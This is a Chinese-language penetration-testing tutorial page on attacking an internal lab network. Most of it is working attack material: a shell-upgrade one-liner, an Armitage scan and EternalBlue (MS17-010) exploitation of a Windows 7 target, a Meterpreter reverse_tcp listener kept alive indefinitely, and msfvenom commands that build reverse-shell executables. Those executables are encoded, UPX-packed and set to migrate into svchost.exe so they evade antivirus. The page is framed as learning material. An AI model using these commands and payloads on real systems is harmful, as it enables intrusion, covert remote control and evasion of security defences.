您好,登錄后才能下訂單哦!
本篇內容主要講解“如何解決內網滲透問題”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“如何解決內網滲透問題”吧!
python -c "import pty;pty.spawn('/bin/bash');" 會話提升
session -u 4 將shell會話提升成meterpreter會話
直接修改payload,原來的設置的payload為shell的木馬也能連上
apt-get install armitage 安裝
armitage 進入界面
不用改直接進入
選擇快速查詢
輸入要查詢的地址
nmap出來存活的主機有(1是物理電腦,2是網關,135是linux靶機,254是廣播地址,128是win7靶機,129是本機)
拒絕訪問打開服務管理器
用所有的漏洞進行探測
搜索ms17
移過去
存在永恒之藍的漏洞
進行滲透
滲透成功
handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp |
show advanced 顯示高級參數設置
set ExitOnSession false 監聽到shell之后端口繼續監聽
set SessionCommunicationTimeout 0 設置會話存活時間,默認5分鐘
set SessionExpirationTimeout 0 設置會話存活時間,默認一星期
EnableStageEncoding 是否允許stage進行編碼
StageEncoder 設置要用的編碼
優秀的編碼:x86/shikata_ga_nai、cmd/powershell_base64
加殼
upx -9 qq.exe -1壓縮更快 -9壓縮更好 -d解壓 -l列表壓縮文件 -t測試壓縮文件 -V顯示版本號 -h給予更多幫助 -L顯示軟件許可證 |
測試壓縮文件能否運行
upx -t qq.com OK表示可以運行 |
回到頂部
(會在運行木馬的時候自動遷移到svchost.exe的對應進程中去)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe |
回
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe |
到此,相信大家對“如何解決內網滲透問題”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。